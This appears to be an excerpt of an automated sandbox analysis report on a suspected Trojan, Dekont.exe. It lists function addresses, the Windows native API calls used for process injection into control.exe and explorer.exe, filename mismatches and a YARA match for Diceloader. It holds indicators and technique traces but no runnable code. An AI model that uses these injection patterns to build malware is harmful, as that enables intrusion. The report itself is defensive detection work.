          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82B60 NtClose,LdrInitializeThunk,8_2_04D82B60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D835C0 NtCreateMutant,LdrInitializeThunk,8_2_04D835C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D84650 NtSuspendThread,8_2_04D84650
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D84340 NtSetContextThread,8_2_04D84340
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CC0 NtQueryVirtualMemory,8_2_04D82CC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CF0 NtOpenProcess,8_2_04D82CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C00 NtQueryInformationProcess,8_2_04D82C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DB0 NtEnumerateKey,8_2_04D82DB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82D00 NtSetInformationFile,8_2_04D82D00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82D30 NtUnmapViewOfSection,8_2_04D82D30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82EE0 NtQueueApcThread,8_2_04D82EE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82E80 NtReadVirtualMemory,8_2_04D82E80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82E30 NtWriteVirtualMemory,8_2_04D82E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82F90 NtProtectVirtualMemory,8_2_04D82F90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82FB0 NtResumeThread,8_2_04D82FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82FA0 NtQuerySection,8_2_04D82FA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82F60 NtCreateProcessEx,8_2_04D82F60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82AF0 NtWriteFile,8_2_04D82AF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82AB0 NtWaitForSingleObject,8_2_04D82AB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82B80 NtQueryInformationFile,8_2_04D82B80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82BA0 NtEnumerateValueKey,8_2_04D82BA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D83090 NtSetValueKey,8_2_04D83090
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D83010 NtOpenDirectoryObject,8_2_04D83010
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D83D70 NtOpenThread,8_2_04D83D70
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D83D10 NtOpenProcessToken,8_2_04D83D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D839B0 NtGetContextThread,8_2_04D839B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A3E0 NtReadFile,8_2_02B4A3E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A330 NtCreateFile,8_2_02B4A330
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A460 NtClose,8_2_02B4A460
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A510 NtAllocateVirtualMemory,8_2_02B4A510
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A3DB NtReadFile,8_2_02B4A3DB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4A50F NtAllocateVirtualMemory,8_2_02B4A50F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,8_2_04B1A036
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B19BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_04B19BAF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1A042 NtQueryInformationProcess,8_2_04B1A042
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B19BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_04B19BB2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 0_2_0271D5BC0_2_0271D5BC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041E8575_2_0041E857
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041DAED5_2_0041DAED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041DA9C5_2_0041DA9C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041E4DB5_2_0041E4DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041D5735_2_0041D573
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00402D895_2_00402D89
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041EE4C5_2_0041EE4C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00409E5B5_2_00409E5B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107A1185_2_0107A118
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010681585_2_01068158
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A01AA5_2_010A01AA
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010981CC5_2_010981CC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010720005_2_01072000
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD01005_2_00FD0100
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109A3525_2_0109A352
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A03E65_2_010A03E6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEE3F05_2_00FEE3F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010802745_2_01080274
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010602C05_2_010602C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010A05915_2_010A0591
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010844205_2_01084420
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010924465_2_01092446
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE05355_2_00FE0535
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108E4F65_2_0108E4F6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFC6E05_2_00FFC6E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010047505_2_01004750
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDC7C05_2_00FDC7C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE07705_2_00FE0770
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FC68B85_2_00FC68B8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010AA9A65_2_010AA9A6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE28405_2_00FE2840
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEA8405_2_00FEA840
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE29A05_2_00FE29A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF69625_2_00FF6962
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0100E8F05_2_0100E8F0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109AB405_2_0109AB40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDEA805_2_00FDEA80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01096BD75_2_01096BD7
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD0CF25_2_00FD0CF2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107CD1F5_2_0107CD1F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0C005_2_00FE0C00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FDADE05_2_00FDADE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF8DBF5_2_00FF8DBF
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01080CB55_2_01080CB5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEAD005_2_00FEAD00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01022F285_2_01022F28
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01000F305_2_01000F30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01082F305_2_01082F30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01054F405_2_01054F40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FF2E905_2_00FF2E90
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0105EFA05_2_0105EFA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE0E595_2_00FE0E59
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FECFE05_2_00FECFE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109EE265_2_0109EE26
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD2FC85_2_00FD2FC8
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109CE935_2_0109CE93
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109EEDB5_2_0109EEDB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE70C05_2_00FE70C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010AB16B5_2_010AB16B
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101516C5_2_0101516C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FEB1B05_2_00FEB1B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCF1725_2_00FCF172
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108F0CC5_2_0108F0CC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010970E95_2_010970E9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109F0E05_2_0109F0E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109132D5_2_0109132D
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFB2C05_2_00FFB2C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE52A05_2_00FE52A0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0102739A5_2_0102739A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FCD34C5_2_00FCD34C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010812ED5_2_010812ED
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010975715_2_01097571
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FD14605_2_00FD1460
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107D5B05_2_0107D5B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109F43F5_2_0109F43F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109F7B05_2_0109F7B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010916CC5_2_010916CC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010759105_2_01075910
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE38E05_2_00FE38E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0104D8005_2_0104D800
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE99505_2_00FE9950
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFB9505_2_00FFB950
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109FB765_2_0109FB76
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01055BF05_2_01055BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0101DBF95_2_0101DBF9
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109FA495_2_0109FA49
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01097A465_2_01097A46
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01053A6C5_2_01053A6C
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFFB805_2_00FFFB80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01025AA05_2_01025AA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0107DAAC5_2_0107DAAC
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01081AA35_2_01081AA3
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0108DAC65_2_0108DAC6
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01091D5A5_2_01091D5A
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01097D735_2_01097D73
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01059C325_2_01059C32
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FFFDC05_2_00FFFDC0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE3D405_2_00FE3D40
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109FCF25_2_0109FCF2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109FF095_2_0109FF09
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE9EB05_2_00FE9EB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0109FFB15_2_0109FFB1
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA3FD25_2_00FA3FD2
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FA3FD55_2_00FA3FD5
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_00FE1F925_2_00FE1F92
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5112326_2_0E511232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E50BB306_2_0E50BB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E50BB326_2_0E50BB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5100366_2_0E510036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5070826_2_0E507082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E50E9126_2_0E50E912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E508D026_2_0E508D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E5145CD6_2_0E5145CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0E7502326_2_0E750232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E74F0366_2_0E74F036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E7460826_2_0E746082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E74AB306_2_0E74AB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E74AB326_2_0E74AB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E74D9126_2_0E74D912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E747D026_2_0E747D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E7535CD6_2_0E7535CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0087764B8_2_0087764B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0087305C8_2_0087305C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0087978B8_2_0087978B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DFE4F68_2_04DFE4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E024468_2_04E02446
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF44208_2_04DF4420
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E105918_2_04E10591
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D505358_2_04D50535
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D6C6E08_2_04D6C6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D4C7C08_2_04D4C7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D747508_2_04D74750
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D507708_2_04D50770
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DE20008_2_04DE2000
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E081CC8_2_04E081CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E101AA8_2_04E101AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DD81588_2_04DD8158
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DEA1188_2_04DEA118
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D401008_2_04D40100
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DD02C08_2_04DD02C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF02748_2_04DF0274
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E103E68_2_04E103E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D5E3F08_2_04D5E3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0A3528_2_04E0A352
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D40CF28_2_04D40CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF0CB58_2_04DF0CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D50C008_2_04D50C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D4ADE08_2_04D4ADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D68DBF8_2_04D68DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DECD1F8_2_04DECD1F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D5AD008_2_04D5AD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0EEDB8_2_04E0EEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D62E908_2_04D62E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0CE938_2_04E0CE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D50E598_2_04D50E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0EE268_2_04E0EE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D42FC88_2_04D42FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D5CFE08_2_04D5CFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DCEFA08_2_04DCEFA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DC4F408_2_04DC4F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D70F308_2_04D70F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF2F308_2_04DF2F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D92F288_2_04D92F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D7E8F08_2_04D7E8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D368B88_2_04D368B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D528408_2_04D52840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D5A8408_2_04D5A840
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1A9A68_2_04E1A9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D529A08_2_04D529A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D669628_2_04D66962
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D4EA808_2_04D4EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E06BD78_2_04E06BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0AB408_2_04E0AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D414608_2_04D41460
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0F43F8_2_04E0F43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DED5B08_2_04DED5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E075718_2_04E07571
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E016CC8_2_04E016CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0F7B08_2_04E0F7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0F0E08_2_04E0F0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E070E98_2_04E070E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DFF0CC8_2_04DFF0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D570C08_2_04D570C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D5B1B08_2_04D5B1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1B16B8_2_04E1B16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D3F1728_2_04D3F172
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D8516C8_2_04D8516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D6B2C08_2_04D6B2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF12ED8_2_04DF12ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D552A08_2_04D552A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D9739A8_2_04D9739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D3D34C8_2_04D3D34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0132D8_2_04E0132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0FCF28_2_04E0FCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DC9C328_2_04DC9C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D6FDC08_2_04D6FDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E07D738_2_04E07D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D53D408_2_04D53D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E01D5A8_2_04E01D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D59EB08_2_04D59EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D51F928_2_04D51F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0FFB18_2_04E0FFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0FF098_2_04E0FF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D538E08_2_04D538E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DBD8008_2_04DBD800
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D599508_2_04D59950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D6B9508_2_04D6B950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DE59108_2_04DE5910
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DFDAC68_2_04DFDAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DEDAAC8_2_04DEDAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D95AA08_2_04D95AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DF1AA38_2_04DF1AA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E07A468_2_04E07A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0FA498_2_04E0FA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DC3A6C8_2_04DC3A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D8DBF98_2_04D8DBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04DC5BF08_2_04DC5BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D6FB808_2_04D6FB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E0FB768_2_04E0FB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4E4CE8_2_02B4E4CE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4D5738_2_02B4D573
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4DA9C8_2_02B4DA9C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4E8578_2_02B4E857
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B39E608_2_02B39E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B39E5B8_2_02B39E5B
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B4EE4C8_2_02B4EE4C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B32FB08_2_02B32FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B32D908_2_02B32D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02B32D898_2_02B32D89
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1A0368_2_04B1A036
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1E5CD8_2_04B1E5CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B12D028_2_04B12D02
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B110828_2_04B11082
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B189128_2_04B18912
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B1B2328_2_04B1B232
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B15B308_2_04B15B30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04B15B328_2_04B15B32
          Source: C:\Users\user\Desktop\Dekont.exeCode function: String function: 00FCB970 appears 278 times
          Source: C:\Users\user\Desktop\Dekont.exeCode function: String function: 0104EA12 appears 86 times
          Source: C:\Users\user\Desktop\Dekont.exeCode function: String function: 01015130 appears 58 times
          Source: C:\Users\user\Desktop\Dekont.exeCode function: String function: 01027E54 appears 102 times
          Source: C:\Users\user\Desktop\Dekont.exeCode function: String function: 0105F290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DCF290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D85130 appears 58 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D97E54 appears 102 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D3B970 appears 280 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DBEA12 appears 86 times
          Source: Dekont.exe, 00000000.00000002.2066130670.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Dekont.exe
          Source: Dekont.exe, 00000000.00000000.2053687925.0000000000536000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGHQc.exe6 vs Dekont.exe
          Source: Dekont.exe, 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Dekont.exe
          Source: Dekont.exe, 00000000.00000002.2080915076.00000000096E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142835506.00000000010CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2145040101.0000000002B8D000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142264362.0000000000B85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Dekont.exe
          Source: Dekont.exeBinary or memory string: OriginalFilenameGHQc.exe6 vs Dekont.exe
          Source: Dekont.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
